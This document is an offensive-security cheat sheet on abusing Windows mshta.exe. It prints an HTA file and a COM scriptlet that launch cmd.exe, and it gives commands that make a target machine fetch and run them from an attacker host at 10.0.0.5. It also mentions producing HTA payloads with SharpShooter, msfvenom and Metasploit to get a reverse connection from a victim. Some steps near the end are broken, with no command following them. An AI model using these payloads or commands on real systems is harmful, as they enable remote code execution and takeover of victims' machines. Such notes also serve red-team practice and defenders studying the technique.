MSHTA

In the following example, we will use an ActiveXObject in our payload as proof of concept to execute cmd.exe. Consider the following HTML code.

#http://10.0.0.5/m.hta
<html>
<body>
<script>
	var c= 'cmd.exe'
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

We can now execute the script on the target machine

mshta.exe http://10.0.0.5/m.hta

Writing a scriptlet file that will launch cmd.exe when invoked:

#http://10.0.0.5/m.sct
<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>

<public>
    <method name="Exec"></method>
</public>

<script language="JScript">
<![CDATA[
	function Exec()	{
		var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
	}
]]>
</script>
</scriptlet>

We can now execute the script on the target machine

# from powershell
cmd /c mshta.exe javascript:a=(GetObject("script:http://10.0.0.5/m.sct")).Exec();close();

Using SharpShooter, we can create a payload that will retrieve and execute arbitrary CSharp source code (.NET).

We can use the msfvenom framework to generate hta files.

We can now execute the script on the target machine

We can use the metasploit framework to generate hta files and directly serv it throught our webserver.

On the victim machine, once we visit the malicious HTA file that was provided as a URL by Metasploit, we should receive a reverse connection.